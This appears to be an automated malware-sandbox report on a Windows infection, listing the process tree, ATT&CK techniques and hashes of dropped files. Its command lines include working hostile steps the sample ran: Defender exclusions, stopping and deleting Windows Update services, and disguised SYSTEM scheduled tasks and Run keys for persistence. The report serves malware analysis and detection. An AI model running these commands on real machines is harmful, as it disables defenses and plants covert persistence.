C:\Users\Admin\AppData\Local\Temp\liuj.exe
"C:\Users\Admin\AppData\Local\Temp\liuj.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1640

C:\Users\Admin\AppData\Local\Temp\liuj.exe
"C:\Users\Admin\AppData\Local\Temp\liuj.exe" -h
4⤵
- Executes dropped EXE
PID:4072

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4712

C:\Users\Admin\AppData\Local\Temp\7304.exe
C:\Users\Admin\AppData\Local\Temp\7304.exe
2⤵
- Executes dropped EXE
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 764
3⤵
- Program crash
PID:5044

C:\Users\Admin\AppData\Local\Temp\12D0.exe
C:\Users\Admin\AppData\Local\Temp\12D0.exe
2⤵
- Executes dropped EXE
PID:3432

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Dfsoeq.dll,start
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4272

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 14135
4⤵
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 480
3⤵
- Program crash
PID:3112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4196

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1120

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:556

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5044

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2920

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4892

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:880

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4180

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:4348

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4920

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4692

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:2484

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4144

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2292

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:1864

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4948

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:240

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3488

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:1424

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4184

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3388

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4928

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2340

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4528

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3888

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4060

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4352

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3172

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4600

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
2⤵
PID:3360

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
3⤵
PID:2348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
2⤵
PID:868

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
3⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4184 -ip 4184
1⤵
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4788 -ip 4788
1⤵
PID:1888

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 608
3⤵
- Program crash
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2416 -ip 2416
1⤵
PID:5104

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1644

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:3168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 600
3⤵
- Program crash
PID:2744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3168 -ip 3168
1⤵
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1424 -ip 1424
1⤵
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3432 -ip 3432
1⤵
PID:1876

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:3980

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:4904

C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
1⤵
PID:3612

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
PID:3168

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
2KB

MD5
88c1baba352577878a6c51f9ef6523de

SHA1
5a2e09c7386f4e2aa1a1fa42708566fff97fa59c

SHA256
582345ce77a9dca1a30e0f55591fb2bb1bff51ea3f169eb76afb6914fabd5029

SHA512
fff3ad502996c43af8c4518fc94364c2a7ec74f27af01bd6e0438cb09550679d7c02b15735231c4414935dbb4398dc6238101de4898351fdbf06f7d381fddf62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
1KB

MD5
1b11a6392d2c43073e05c7ea57724b91

SHA1
684593b291c26ba749c7bd07a76d1b6f1ff616e1

SHA256
1166ec0c19ebb36567b96b919573eacb2279bdff4367ebd5abf6182c918976dc

SHA512
87d9c26d11a95df4b6d08453f3183c9d7d77dbd420f9f52b73aed18122cac573f698a1a094effdcd8118f7f5bc519b9f7de1ebd64d5fc86e886f9546bff3052e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
488B

MD5
56056c2352cf7a492d942aa58cfc3c6d

SHA1
102455ba00b7e68a4b20e3469fa8ff3681942231

SHA256
c85fca1576e772f81448b046d9c59a3909951ccd4efa602b0a8c399efa507529

SHA512
2ef949479cfdd8dcb7b765aaed07889f2c52536c5df70aed58d142966bc62b1590b79c51b8cb727801518a653aed247ffbd49a1dd456f086860b00b75ae0eb0b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
482B

MD5
b925def52738bb270884bf0bd4537c04

SHA1
823f83437982f6d1a4e15537e02813c007f25e90

SHA256
21276e14fe628206e54aa25ce500ea31bd50f5c65274cb99bccd9ce59536908b

SHA512
e4082920994cb4627e7d5323572c1230209419e86e0d889c5f5350c133b6399a6f5bf4b093913585a968edce80b33ffb8ca92db04e600c03345b4c4bafee7ae3

Download Submit
C:\Users\Admin\AppData\Local\7ddf794f-4728-451c-8d9b-c75d727c8a8e\45C5.exe
Filesize
847KB

MD5
9f5338b4b61243e58465cb849059be56

SHA1
5ca8fbb0356f1c5e2d75de93e6e1271e942a199f

SHA256
91e6c80af515519f99e767a78845e29e09370f989461b44536fff1a0f54f21a2

SHA512
38b2a734c46a06c9946596593b3e0a1650c800d85212ab1258c645799d53e8a7ae29bf4649c972bd48f40c64c151da502336cdcace09ad3b352376cd865fad6a

Download Submit
C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe
Filesize
422KB

MD5
0b622eb410bfb32c5fa7b45eb3c116d2

SHA1
606d111174079e4d784e95f285805f14116e6d63

SHA256
9b7b45434353b99f97d33f44e225e71b9c164cd21ae56335c078cca20ae29c1d

SHA512
ffc1c0caf526c598624845c4d15df2fd68309f8027373c971ed7405f1bda52e89db6b936ce11937d038c3c1a2dba4fcbc70ba8f28d8d1aa4bf4325f08a6a61c4

Download Submit
C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe
Filesize
422KB

MD5
0b622eb410bfb32c5fa7b45eb3c116d2

SHA1
606d111174079e4d784e95f285805f14116e6d63

SHA256
9b7b45434353b99f97d33f44e225e71b9c164cd21ae56335c078cca20ae29c1d

SHA512
ffc1c0caf526c598624845c4d15df2fd68309f8027373c971ed7405f1bda52e89db6b936ce11937d038c3c1a2dba4fcbc70ba8f28d8d1aa4bf4325f08a6a61c4

Download Submit
C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build2.exe
Filesize
422KB

MD5
0b622eb410bfb32c5fa7b45eb3c116d2

SHA1
606d111174079e4d784e95f285805f14116e6d63

SHA256
9b7b45434353b99f97d33f44e225e71b9c164cd21ae56335c078cca20ae29c1d

SHA512
ffc1c0caf526c598624845c4d15df2fd68309f8027373c971ed7405f1bda52e89db6b936ce11937d038c3c1a2dba4fcbc70ba8f28d8d1aa4bf4325f08a6a61c4

Download Submit
C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build3.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\7e611b0d-0d6c-4f84-aea6-c021f44657c8\build3.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
560B

MD5
b55df01ced4a24bd57bc9c33989ba09b

SHA1
be9c4d1994fcf006f6ace6773c2f8e41e8e47f1d

SHA256
cdfae467273732d021c394970c10c79e4d8237525071cbca12be2c0becfd87c3

SHA512
98220e57af248e4ea63199e61d39fb985f319472c5aa1478ac79b8c8de366b78c68f82ee4d89334d0b6279aca2a0669e4dc6f6bee0c4b3c52d1dd3508d53bb9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4162e6d4d86f3d02a967ae61c498be84

SHA1
8e9ff444ce79a3e30e4cc3ca3773fb22b4f38a55

SHA256
758aa757854abe3a41e0f9cf9f5a2e67092f91f62fcced70dc257b20fa38ef74

SHA512
d86c663de793ad79b1788dda18432095788495a4712480866d4a9f76b64b4efba9fee0ca11306afa38aeb49f8d49f07c4bd11612f60e812224157b2cb141b9a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\12D0.exe
Filesize
3.8MB

MD5
6dfc250114d5bb8bae7339a713d90540

SHA1
585fa9af8cc8f0cfd2d900d1c5d7f4554691bfe4

SHA256
94b9e769bff8b6bb088d54a286006b1909abf96c979e5374501958c2785e02a0

SHA512
35746bf72601739cfa878c92439cc51719d35dd41ee793dbdd8b4a6ad93ebf0c080b9a2bf17b9098312e56fea7422bd950a905ffd1478e181bdc92b529acc623

Download Submit
C:\Users\Admin\AppData\Local\Temp\12D0.exe
Filesize
3.8MB

MD5
6dfc250114d5bb8bae7339a713d90540

SHA1
585fa9af8cc8f0cfd2d900d1c5d7f4554691bfe4

SHA256
94b9e769bff8b6bb088d54a286006b1909abf96c979e5374501958c2785e02a0

SHA512
35746bf72601739cfa878c92439cc51719d35dd41ee793dbdd8b4a6ad93ebf0c080b9a2bf17b9098312e56fea7422bd950a905ffd1478e181bdc92b529acc623

Download Submit
C:\Users\Admin\AppData\Local\Temp\416E.exe
Filesize
378KB

MD5
b141bc58618c537917cc1da179cbe8ab

SHA1
c76d3f5eeae9493e41a272a974b5dfec5f4e4724

SHA256
fd999e4a07d8b3d95f9d9231fd496b0125b56094f1b03ddca7a7b074c1d8c03e

SHA512
5c72f63124a394602a36a4f985e33a41e8159f54653f431c270b8f0fa8e13131517c31b497a936d5f5d3d27397f40fc7909efc4bfd04c01bcca7f306860c3114

Download Submit
C:\Users\Admin\AppData\Local\Temp\416E.exe
Filesize
378KB

MD5
b141bc58618c537917cc1da179cbe8ab

SHA1
c76d3f5eeae9493e41a272a974b5dfec5f4e4724

SHA256
fd999e4a07d8b3d95f9d9231fd496b0125b56094f1b03ddca7a7b074c1d8c03e

SHA512
5c72f63124a394602a36a4f985e33a41e8159f54653f431c270b8f0fa8e13131517c31b497a936d5f5d3d27397f40fc7909efc4bfd04c01bcca7f306860c3114

Download Submit
C:\Users\Admin\AppData\Local\Temp\43FF.exe
Filesize
1.6MB

MD5
dc4d8acbc96e90cd6d6af29fe5d45127

SHA1
84015889aaf56a01d8304fad09adfb7be70abe29

SHA256
758a7414cdf99699a3caf38783bd4a45391b8f56734b6a5c7b5502ac142f1563

SHA512
cb2befef94883dab2aa5f121206ca928065c810e3b3d34b3c9c03918f22d7086f6e1de6fb75a4dc245debb0d4a88062acd07f051f2015509d1a30b5166490cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\43FF.exe
Filesize
1.6MB

MD5
dc4d8acbc96e90cd6d6af29fe5d45127

SHA1
84015889aaf56a01d8304fad09adfb7be70abe29

SHA256
758a7414cdf99699a3caf38783bd4a45391b8f56734b6a5c7b5502ac142f1563

SHA512
cb2befef94883dab2aa5f121206ca928065c810e3b3d34b3c9c03918f22d7086f6e1de6fb75a4dc245debb0d4a88062acd07f051f2015509d1a30b5166490cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\45C5.exe
Filesize
847KB

MD5
9f5338b4b61243e58465cb849059be56

SHA1
5ca8fbb0356f1c5e2d75de93e6e1271e942a199f

SHA256
91e6c80af515519f99e767a78845e29e09370f989461b44536fff1a0f54f21a2

SHA512
38b2a734c46a06c9946596593b3e0a1650c800d85212ab1258c645799d53e8a7ae29bf4649c972bd48f40c64c151da502336cdcace09ad3b352376cd865fad6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\45C5.exe
Filesize
847KB

MD5
9f5338b4b61243e58465cb849059be56

SHA1
5ca8fbb0356f1c5e2d75de93e6e1271e942a199f

SHA256
91e6c80af515519f99e767a78845e29e09370f989461b44536fff1a0f54f21a2

SHA512
38b2a734c46a06c9946596593b3e0a1650c800d85212ab1258c645799d53e8a7ae29bf4649c972bd48f40c64c151da502336cdcace09ad3b352376cd865fad6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\45C5.exe
Filesize
847KB

MD5
9f5338b4b61243e58465cb849059be56

SHA1
5ca8fbb0356f1c5e2d75de93e6e1271e942a199f

SHA256
91e6c80af515519f99e767a78845e29e09370f989461b44536fff1a0f54f21a2

SHA512
38b2a734c46a06c9946596593b3e0a1650c800d85212ab1258c645799d53e8a7ae29bf4649c972bd48f40c64c151da502336cdcace09ad3b352376cd865fad6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\45C5.exe
Filesize
847KB

MD5
9f5338b4b61243e58465cb849059be56

SHA1
5ca8fbb0356f1c5e2d75de93e6e1271e942a199f

SHA256
91e6c80af515519f99e767a78845e29e09370f989461b44536fff1a0f54f21a2

SHA512
38b2a734c46a06c9946596593b3e0a1650c800d85212ab1258c645799d53e8a7ae29bf4649c972bd48f40c64c151da502336cdcace09ad3b352376cd865fad6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\45C5.exe
Filesize
847KB

MD5
9f5338b4b61243e58465cb849059be56

SHA1
5ca8fbb0356f1c5e2d75de93e6e1271e942a199f

SHA256
91e6c80af515519f99e767a78845e29e09370f989461b44536fff1a0f54f21a2

SHA512
38b2a734c46a06c9946596593b3e0a1650c800d85212ab1258c645799d53e8a7ae29bf4649c972bd48f40c64c151da502336cdcace09ad3b352376cd865fad6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\4C7D.exe
Filesize
357KB

MD5
60dcdff42c5c3aa63e369e224a938725

SHA1
fba3a60bdcd0f685790d78f9ff6b6fc6726c3a4a

SHA256
f520b31f3601ada662caf52733a7472d1d9d1c281c7a40e519c3830b9b556603

SHA512
51d2fc04c0641f0c8234546d4eeaca11e0729bbd2711e5f2f7bd23a9b03786a49e314b0cc3fcb2bdb5e643d4cbde7901c96b088ba94eb7eb8d5e0dbeb579f961

Download Submit
C:\Users\Admin\AppData\Local\Temp\4C7D.exe
Filesize
357KB

MD5
60dcdff42c5c3aa63e369e224a938725

SHA1
fba3a60bdcd0f685790d78f9ff6b6fc6726c3a4a

SHA256
f520b31f3601ada662caf52733a7472d1d9d1c281c7a40e519c3830b9b556603

SHA512
51d2fc04c0641f0c8234546d4eeaca11e0729bbd2711e5f2f7bd23a9b03786a49e314b0cc3fcb2bdb5e643d4cbde7901c96b088ba94eb7eb8d5e0dbeb579f961

Download Submit
C:\Users\Admin\AppData\Local\Temp\4E53.exe
Filesize
349KB

MD5
2774ab48175d3a029c4106534954577c

SHA1
892bf5d54652112cf198bc80bf86934ec5285f64

SHA256
f67132cd3288ce9b7bd58ddee547ac519e217ae8f594d70b1551b48b0efab8c4

SHA512
dc1adef58490895c277bb48e400870326b893aa04846fc1fd7645840e588f0135eba5e227073c22cb93dea40969a7e8645f4c407574338a5924fe7627b7e252b

Download Submit
C:\Users\Admin\AppData\Local\Temp\4E53.exe
Filesize
349KB

MD5
2774ab48175d3a029c4106534954577c

SHA1
892bf5d54652112cf198bc80bf86934ec5285f64

SHA256
f67132cd3288ce9b7bd58ddee547ac519e217ae8f594d70b1551b48b0efab8c4

SHA512
dc1adef58490895c277bb48e400870326b893aa04846fc1fd7645840e588f0135eba5e227073c22cb93dea40969a7e8645f4c407574338a5924fe7627b7e252b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B92.exe
Filesize
7.4MB

MD5
2850ccb10aa6f6700d555ca67f89f1e0

SHA1
c55b593e654f822ed59d86bab7f8e081b331f132

SHA256
4589f71870479cdddc1439394eb7c27da1c95d1f7a89016168f32f6791f541ab

SHA512
8ee232798200eb6b25116ef75c3a07f61812ee3865b95272e92010ccc021d3fb261982a309c69a592cab5e397de945733133bb2cfd77faaa0be9acf3038df0c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B92.exe
Filesize
7.4MB

MD5
